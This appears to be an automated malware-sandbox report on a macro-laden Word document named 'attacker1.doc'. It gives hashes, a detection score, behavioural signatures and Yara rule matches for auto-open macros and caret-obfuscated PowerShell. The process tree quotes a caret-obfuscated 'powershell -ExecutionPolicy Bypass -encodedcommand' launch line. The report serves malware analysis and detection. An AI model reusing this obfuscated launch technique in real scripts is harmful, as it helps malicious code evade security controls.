Windows Analysis Report attacker1.doc

Overview

General Information

Sample Name:attacker1.doc
Analysis ID:520834
MD5:4443840f2870c2cd55062bdcab07e5fd
SHA1:61911e604362338b0f9c91c4aa69696a88dad62f
SHA256:2979b5fbb454e2f13d89e58177f8c1f881bd3f0a0bebb1d27da9e189ba9d284e

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Machine Learning detection for sample
Document contains an embedded VBA macro with suspicious strings
Obfuscated command line found
Yara detected Obfuscated Powershell
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Document contains an embedded VBA macro which executes code when the document is opened / closed
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Document contains embedded VBA macros
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1532 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • cmd.exe (PID: 668 cmdline: CmD /C P^O^W^E^R^S^H^E^L^L ^-^N^o^P^r^o^f^i^l^e^ -^E^x^e^cutionPolicy B^^^yp^ass -encodedcommand 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2984 cmdline: POWERSHELL -NoProfile -ExecutionPolicy B^ypass -encodedcommand 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: attacker1.doc
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0xacd7:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xacd7:$r2: P^O^W^E^R^S^H^E^L^L

Source: attacker1.doc
Rule: Office_AutoOpen_Macro
Description: Detects a Microsoft Office file that contains the AutoOpen Macro function
Author: Florian Roth
Strings:
  • 0x11f8f:$s1: AutoOpen
  • 0x13c7c:$s1: AutoOpen
  • 0xf500:$s2: Macros

Source: attacker1.doc
Rule: JoeSecurity_ObfuscatedPowershell
Description: Yara detected Obfuscated Powershell
Author: Joe Security

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DF527BC4B1A394C70E.TMP
Rule: SUSP_VBA_FileSystem_Access
Description: Detects suspicious VBA that writes to disk and is activated on document open
Author: Florian Roth
Strings:
  • 0xc1c8:$s1: \Common Files\Microsoft Shared\
  • 0x37b1:$s2: Scripting.FileSystemObject
  • 0x3cd8:$a3: AutoOpen
  • 0xc6b6:$a3: AutoOpen
  • 0xc91b:$a3: AutoOpen
  • 0xed63:$a3: AutoOpen

Memory Dumps

Source: 00000002.00000002.408319422.000000000029F000.00000004.00000020.sdmp
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0x5b42:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x5b42:$r2: P^O^W^E^R^S^H^E^L^L

Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0x1f9f:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x1f9f:$r2: P^O^W^E^R^S^H^E^L^L

Source: 00000002.00000002.408387052.00000000004A4000.00000004.00000040.sdmp
Rule: JoeSecurity_ObfuscatedPowershell
Description: Yara detected Obfuscated Powershell
Author: Joe Security

Source: 00000002.00000002.408293787.0000000000260000.00000004.00000020.sdmp
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0x25de:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x4307:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x25de:$r2: P^O^W^E^R^S^H^E^L^L
  • 0x4307:$r2: P^O^W^E^R^S^H^E^L^L

Source: Process Memory Space: cmd.exe PID: 668
Rule: SUSP_PowerShell_Caret_Obfuscation_2
Description: Detects powershell keyword obfuscated with carets
Author: Florian Roth
Strings:
  • 0x2e8e:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xc56e:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xdd4b:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xe8c7:$r1: P^O^W^E^R^S^H^E^L^L
  • 0xf325:$r1: P^O^W^E^R^S^H^E^L^L
  • 0x2e8e:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xc56e:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xdd4b:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xe8c7:$r2: P^O^W^E^R^S^H^E^L^L
  • 0xf325:$r2: P^O^W^E^R^S^H^E^L^L

Sigma Overview

System Summary:
